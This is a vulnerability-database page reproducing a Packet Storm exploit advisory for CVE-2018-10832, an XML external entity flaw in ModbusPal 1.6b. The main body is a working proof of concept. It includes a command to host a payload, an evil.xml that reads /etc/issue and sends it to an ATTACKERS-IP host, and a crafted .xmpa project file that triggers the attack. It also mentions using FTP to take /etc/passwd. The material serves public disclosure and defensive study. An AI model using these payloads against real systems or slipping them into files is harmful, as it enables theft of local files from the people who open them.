Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTrent GordonPACKETSTORM:147573
HistoryMay 10, 2018 - 12:00 a.m.

ModbusPal 1.6b XML External Entity Injection

2018-05-1000:00:00
Trent Gordon
packetstormsecurity.com
53

0.002 Low

EPSS

Percentile

54.5%

JSON
`[+] Exploit Title: ModbusPal XXE Injection  
[+] Date: 05-08-2018  
[+] Exploit Author: Trent Gordon  
[+] Vendor Homepage: http://modbuspal.sourceforge.net/  
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files  
[+] Version: 1.6b  
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151  
[+] CVE: CVE-2018-10832  
  
1. Vulnerability Description  
  
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.  
  
2. Proof of Concept  
  
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)  
  
b.) Contents of hosted "evil.xml"  
  
<!ENTITY % data SYSTEM "file:///etc/issue">  
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">  
  
c.) Example Exploited "xxe.xmpa"  
  
<?xml version="1.0" ?>  
  
<!DOCTYPE r [  
  
<!ELEMENT r ANY >  
  
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">  
  
%sp;  
  
%param1;  
  
]>  
  
<r>&exfil;</r>  
  
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">  
  
<modbuspal_automation>  
  
<automation name="temp" step="1.0" loop="true" init="0.0">  
  
</automation>  
  
</modbuspal_automation>  
  
3. Additional Details  
  
Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.  
  
  
`

Related

cve 1
cvelist 1
nvd 1
prion 1
zdt 1
exploitpack 1
exploitdb 1
cve
cve
CVE-2018-10832
2018-05-11 21:29:00
cvelist
cvelist
CVE-2018-10832
2018-05-11 21:00:00
nvd
nvd
CVE-2018-10832
2018-05-11 21:29:00
prion
prion
Xxe
2018-05-11 21:29:00
zdt
zdt
ModbusPal 1.6b - XML External Entity Injection Vulnerability
2018-05-10 00:00:00
exploitpack
exploitpack
ModbusPal 1.6b - XML External Entity Injection
2018-05-10 00:00:00
exploitdb
exploitdb
ModbusPal 1.6b - XML External Entity Injection
2018-05-10 00:00:00

0.002 Low

EPSS

Percentile

54.5%

JSON
Related for PACKETSTORM:147573
cve1cvelist1nvd1prion1zdt1exploitpack1exploitdb1